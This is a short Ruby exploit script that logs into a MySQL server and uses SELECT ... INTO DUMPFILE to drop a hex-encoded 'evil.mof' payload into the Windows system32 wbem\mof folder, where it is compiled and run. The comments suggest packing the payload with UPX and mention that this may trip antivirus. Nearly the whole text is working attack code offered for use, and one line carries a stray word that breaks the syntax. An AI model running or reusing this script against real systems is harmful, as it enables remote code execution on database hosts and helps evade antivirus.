#!/usr/bin/env ruby
# Code Snippet by HR
# We need mysql gem for connection handling
require \'rubygems\'
require \'mysql\'
target=\'127.0.0.1\' # Your Target IP running MySQL
user=\'username\' # MySQL User
pass=\'password\' # MySQL Password
file=\'/local/path/to/evil.mof\' # Local Evil .MOF File to upload
target_path="c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\wbem\\\\\\\\mof\\\\\\\\evil.mof" # Path on Target to MOF compiler
# Establish connection or fail
begin
dbc = Mysql.connect(target, user, pass)
rescue Mysql::Error => e
puts "Connection Problem!"
puts "\\t=> #{e}"
exit 666;
end
# Take our local file, convert to hex and write to target filesystem
# This will work for any binary file, not just .MOF files....
# Try to keep your upload file size small or you will have to use more SQL magic to upload it in chunks to a temp db and table, then dump the table content to file but lets keep it simple....
data = "0x" + File.open(file, \'rb\').read.unpack(\'H*\').first
begin
dbc.query("SELECT #{data} INTO DUMPFILE \'#{target_path}\'")
puts "File uploaded successfully!"
rescue Mysql::Error => e
puts "Problem writing payload to file!"white
puts "\\t=> #{e}"
if e =~ /MySQL server has gone away/
puts "This is likely due to payload which is too large in size....."
puts "Try compressing with UPX to shrink size down: upx 9 -qq #{file}" # UPX can shrink your payload big time, but can cause some AV to freak out so be smart and use what works for you....
puts "\\t=> Then try again....."
end
end
#EOF